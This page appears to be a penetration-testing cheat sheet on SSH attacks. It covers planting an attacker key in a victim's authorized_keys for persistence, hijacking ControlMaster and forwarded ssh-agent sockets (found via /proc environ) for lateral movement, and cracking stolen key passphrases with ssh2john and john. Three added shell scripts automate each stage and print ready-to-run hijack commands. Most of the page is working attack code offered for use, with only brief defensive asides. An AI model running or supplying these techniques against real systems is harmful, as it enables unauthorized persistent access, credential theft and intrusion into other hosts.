AJ-Labz
SSH

SSH Persistence and Hijacking

Persistence

If the victim user's ~/.ssh/authorized_keys is writable (or ~/.ssh can be created), append your own public key to it:

~/.ssh/authorized_keys

Create keys on attacker box

ssh-keygen

Copy id_rsa.pub key to victim

Either paste the public key into the file on the victim (run there, as the target user), or push it from the attacker box with ssh-copy-id or a piped cat, both of which prompt once for the victim's password:

echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/kali/.ssh/authorized_keys
ssh-copy-id -p <port-number> user@hostname.example.com
cat ~/.ssh/id_rsa.pub | ssh <user>@<hostname> 'mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys'

sshd (StrictModes, on by default) silently ignores authorized_keys if ~/.ssh or the file itself is group- or world-writable, so keep them at 700 and 600 respectively.

Now you can SSH in as that user without their password (the key itself has no passphrase unless you set one at ssh-keygen time):

ssh kali@linuxvictim
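The procedure above, as an added example (not code from the original page): a small shell script that does what ssh-copy-id does when run on the victim, but idempotently (a second run does not add a duplicate line) and with the directory and file modes that sshd's StrictModes requires, plus the matching clean-up for the end of an engagement. The key string is constructed filler, not real key material; the scratch path used by the demo is an assumption.

```shell
#!/bin/sh
# Added example, not code from the original page: install a public key into an
# authorized_keys file the way ssh-copy-id does, idempotently and with the
# permissions sshd's default StrictModes needs before it honours the file.
# SAMPLE_PUBKEY is constructed filler, not real key material.
set -eu

SAMPLE_PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedExampleKeyNotRealMaterial0000 kali@kali'

# install_key <pubkey-line> <authorized_keys-path>
# Prints "installed" or "already present".
install_key() {
    local pubkey akfile sshdir keyid
    pubkey=$1
    akfile=$2
    sshdir=$(dirname "$akfile")

    # sshd ignores the file if ~/.ssh or authorized_keys is group/world writable
    mkdir -p "$sshdir"
    chmod 700 "$sshdir"
    touch "$akfile"
    chmod 600 "$akfile"

    # Match on key type + base64 blob only; the trailing comment is free text
    keyid=$(printf '%s\n' "$pubkey" | awk '{print $1 " " $2}')
    if grep -qF -- "$keyid" "$akfile"; then
        echo "already present"
        return 0
    fi
    printf '%s\n' "$pubkey" >> "$akfile"
    echo "installed"
}

# count_keys <authorized_keys-path>: number of key lines, ignoring comments/blanks
count_keys() {
    grep -cE '^(ssh-|ecdsa-|sk-)' "$1" || true
}

# remove_key <pubkey-line> <authorized_keys-path>: remove only our key, keep the rest
remove_key() {
    local keyid tmp
    keyid=$(printf '%s\n' "$1" | awk '{print $1 " " $2}')
    tmp=$(mktemp)
    grep -vF -- "$keyid" "$2" > "$tmp" || true
    cat "$tmp" > "$2"      # overwrite in place so owner and mode stay as they were
    rm -f "$tmp"
}

# Demo against a scratch directory; on a real target the path is
# /home/<user>/.ssh/authorized_keys (or /root/.ssh/authorized_keys).
demo=$(mktemp -d)
install_key "$SAMPLE_PUBKEY" "$demo/.ssh/authorized_keys"
install_key "$SAMPLE_PUBKEY" "$demo/.ssh/authorized_keys"
echo "keys present: $(count_keys "$demo/.ssh/authorized_keys")"
rm -rf "$demo"
```

Run it as the target user on the victim after transferring your id_rsa.pub content; the second install_key call is what you get when a dropper is re-run, and count_keys is also a quick defender-side check for keys that should not be there.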

SSH Agent Forwarding

Lab setup: the Kali box keeps its key in ssh-agent and forwards the agent through an intermediate host (controller) to a second host (linuxvictim). Two things make the hijacking below possible: ForwardAgent places a proxy of the agent socket on the controller, and ControlMaster leaves a reusable control socket in ~/.ssh/controlmaster.

  • Use an existing connection to get to another machine

  • done by modifying ~/.ssh/config

  • any new connection to the same user@host:port will reuse an existing control socket instead of authenticating again

  • Create keys

ssh-keygen
  • public keys need to be copied to the other boxes if possible

ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@controller
ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@linuxvictim
  • Modify the local ~/.ssh/config file to enable agent forwarding (the full config below already contains this line)

echo "ForwardAgent yes" >> ~/.ssh/config
  • The intermediate server (controller) must allow agent forwarding in sshd_config; AllowAgentForwarding defaults to yes, so it only blocks you if it has been set to no explicitly

grep -i AllowAgentForwarding /etc/ssh/sshd_config
  • start the ssh agent on our Kali box and import its environment variables into the current shell

eval "$(ssh-agent -s)"
  • now add our keys to the ssh agent

ssh-add
  • ssh into the controller as offsec, then ssh into linuxvictim as offsec and exit the linuxvictim session; the control socket for linuxvictim stays open on the controller for the ControlPersist time (10 minutes below)

Controlmaster config

Host *
ControlPath ~/.ssh/controlmaster/%r@%h:%p
ControlMaster auto
ControlPersist 10m
ForwardAgent yes

ForwardAgent yes under Host * is what exposes the agent on every host you touch; that is the point of this lab, but on a real engagement restrict it to the hosts that need it.

  • the config file must not be writable by group or others (ssh refuses it with "Bad owner or permissions"), and the controlmaster folder must exist

chmod 644 ~/.ssh/config
mkdir ~/.ssh/controlmaster
  • an open session shows up as a socket file in the controlmaster folder

ls -al ~/.ssh/controlmaster/
  • If there is an entry you can ride that connection (no password or key needed) by pointing ssh at the socket with -S

ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim

Enumeration of sockets

On the controller, as a user who can read offsec's processes (offsec itself, or root), find a process that carries the forwarded agent in its environment ("SSH_AUTH_SOCK"):

ps aux | grep ssh

pstree -p offsec | grep ssh

cat /proc/[pid]/environ | tr '\0' '\n'

Look for the "SSH_AUTH_SOCK" line. /proc/[pid]/environ is NUL-separated, so without the tr every variable runs together on one line. The socket lives in a 0700 directory (/tmp/ssh-XXXXXXXXXX/) owned by the connecting user, so you must be that user or root to use it. Point your own shell at the socket to list the forwarded keys, then ssh onward as that user; the private key never leaves the Kali box, the agent on Kali just signs the challenge for you.

SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l
SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh offsec@linuxvictim
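The ControlMaster hijack and the socket enumeration above, as one added example (not code from the original page): a shell script to run as the foothold user on the controller that pulls SSH_AUTH_SOCK out of every readable /proc/<pid>/environ (handling the NUL separators), lists the keys each agent will sign with, and then walks the ControlMaster directory, splitting each %r@%h:%p socket name back into user, host and port and checking with ssh -O check whether the master behind it is still alive. The socket paths follow the OpenSSH defaults and the ControlPath from the config above; the user and host names are the page's lab names, and the constructed environ contents in the test are not from a real host.

```shell
#!/bin/sh
# Added example, not code from the original page: enumerate the two kinds of
# socket a foothold can ride on the intermediate host (the page's "controller"):
# forwarded ssh-agent sockets found via /proc/<pid>/environ, and ControlMaster
# sockets left behind by the ControlPath ~/.ssh/controlmaster/%r@%h:%p config.
set -eu

# auth_sock_from_environ <environ-file>
# /proc/<pid>/environ is NUL-separated, so "cat" shows one run-on line and grep
# cannot anchor on it; turn NULs into newlines first.
# Prints the SSH_AUTH_SOCK value, or nothing if the process has none.
auth_sock_from_environ() {
    tr '\0' '\n' < "$1" | sed -n 's/^SSH_AUTH_SOCK=//p' | head -n 1
}

# list_agent_sockets: distinct SSH_AUTH_SOCK values across all readable /proc
# entries. Only our own processes are readable unless we are root, which is
# also who can enter the 0700 /tmp/ssh-XXXXXXXXXX/ directory the socket sits in.
list_agent_sockets() {
    for env in /proc/[0-9]*/environ; do
        auth_sock_from_environ "$env" 2>/dev/null || true
    done | sort -u
}

# probe_agent <socket>: ask the agent behind the socket which keys it holds.
# A forwarded agent answers with the Kali box's keys; the private key never
# leaves Kali, the agent only signs for us.
probe_agent() {
    SSH_AUTH_SOCK=$1 ssh-add -l 2>&1 || true
}

# parse_control_socket <path>: split a %r@%h:%p socket name into "user host port".
# Taking the port from the last ':' keeps IPv6 literals in %h intact.
parse_control_socket() {
    local name port rest
    name=$(basename "$1")
    port=${name##*:}
    rest=${name%:*}
    printf '%s %s %s\n' "${rest%%@*}" "${rest#*@}" "$port"
}

# list_control_sockets [dir]: every socket in a ControlMaster directory with a
# liveness check. "ssh -O check" only talks to the master process, so a dead
# socket (master exited, ControlPersist expired) is reported without ssh trying
# to open a fresh connection with our own (absent) credentials.
list_control_sockets() {
    local dir s
    dir=${1:-$HOME/.ssh/controlmaster}
    [ -d "$dir" ] || return 0
    for s in "$dir"/*; do
        [ -S "$s" ] || continue
        parse_control_socket "$s" | while read -r user host port; do
            if ssh -O check -S "$s" "$user@$host" >/dev/null 2>&1; then
                echo "LIVE  $s  ->  ssh -S $s -p $port $user@$host"
            else
                echo "DEAD  $s"
            fi
        done
    done
}

# Demo: run as the foothold user on the controller.
for sock in $(list_agent_sockets); do
    echo "agent socket: $sock"
    probe_agent "$sock"
done
list_control_sockets
```

A LIVE entry gives you the exact ssh -S command to reuse the connection; an agent socket that answers ssh-add -l with a key list can be exported (SSH_AUTH_SOCK=... ssh user@host) to authenticate anywhere that key is trusted for as long as the forwarding session stays open.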

Cracking SSH Keys

If you recover a passphrase-protected private key (here svuser.key), copy it to Kali and crack the passphrase offline:

python3 /usr/share/john/ssh2john.py svuser.key > svuser.hash

sudo gunzip /usr/share/wordlists/rockyou.txt.gz (if not already done)

john --wordlist=/usr/share/wordlists/rockyou.txt ./svuser.hash

Use the cracked key to move laterally. ssh refuses a private key file that is readable by others, so chmod it to 600 first:

ssh -i ./svuser.key -o StrictHostKeyChecking=no svuser@controller
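The cracking steps above, as an added example (not code from the original page): a wrapper that first decides whether the key needs cracking at all (legacy PEM keys announce encryption in a Proc-Type header; the newer openssh-key-v1 format does not, so for those it asks ssh-keygen to read the key with an empty passphrase), fixes the key file mode, finds ssh2john in either place Kali has shipped it, and pulls the recovered passphrase out of john --show. Tool locations are Kali's; the file name svuser.key is the page's; the PEM headers in the test are constructed and contain no real key material.

```shell
#!/bin/sh
# Added example, not code from the original page: wrap the ssh2john/john steps
# so a recovered private key is handled end to end. Tool locations are Kali's
# (/usr/share/john/ssh2john.py, /usr/share/wordlists/rockyou.txt).
# Usage: sh crack_key.sh ./svuser.key [wordlist]
set -eu

# key_is_encrypted <keyfile>: exit 0 if the key needs a passphrase.
# Legacy PEM keys carry a "Proc-Type: 4,ENCRYPTED" header. The newer
# "openssh-key-v1" format does not, so for those we ask ssh-keygen to read the
# key with an empty passphrase; failure means a passphrase is required (or
# ssh-keygen is missing, in which case we err on the side of cracking).
key_is_encrypted() {
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        return 0
    fi
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
        if ssh-keygen -y -P '' -f "$1" >/dev/null 2>&1; then
            return 1
        fi
        return 0
    fi
    return 1
}

# ssh2john_cmd: newer Kali images put ssh2john on PATH, older ones only ship
# the script under /usr/share/john.
ssh2john_cmd() {
    if command -v ssh2john >/dev/null 2>&1; then
        echo ssh2john
    elif [ -f /usr/share/john/ssh2john.py ]; then
        echo "python3 /usr/share/john/ssh2john.py"
    else
        echo "ssh2john not found" >&2
        return 1
    fi
}

# crack_key <keyfile> [wordlist]: prints the recovered passphrase on success.
crack_key() {
    local key wl cmd
    key=$1
    wl=${2:-/usr/share/wordlists/rockyou.txt}

    chmod 600 "$key"    # ssh -i refuses a key file that others can read
    if ! key_is_encrypted "$key"; then
        echo "$key has no passphrase; use it directly: ssh -i $key user@host" >&2
        return 0
    fi

    # Kali ships rockyou compressed; -k keeps the .gz so the box stays as found
    if [ ! -f "$wl" ] && [ -f "$wl.gz" ]; then
        sudo gunzip -k "$wl.gz"
    fi

    cmd=$(ssh2john_cmd)   # set -e aborts here if neither location exists
    $cmd "$key" > "$key.hash"
    john --wordlist="$wl" "$key.hash" >/dev/null 2>&1 || true
    # john --show prints "<file>:<passphrase>" then a summary line; keep the passphrase
    john --show "$key.hash" | sed -n '1s/^[^:]*://p'
}

if [ $# -gt 0 ]; then
    crack_key "$@"
fi
```

Checking for encryption first matters in practice: an unencrypted key run through ssh2john produces a hash john can never crack, and you would waste the wordlist on a key that already works with ssh -i as it is.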
Last updated 3 years ago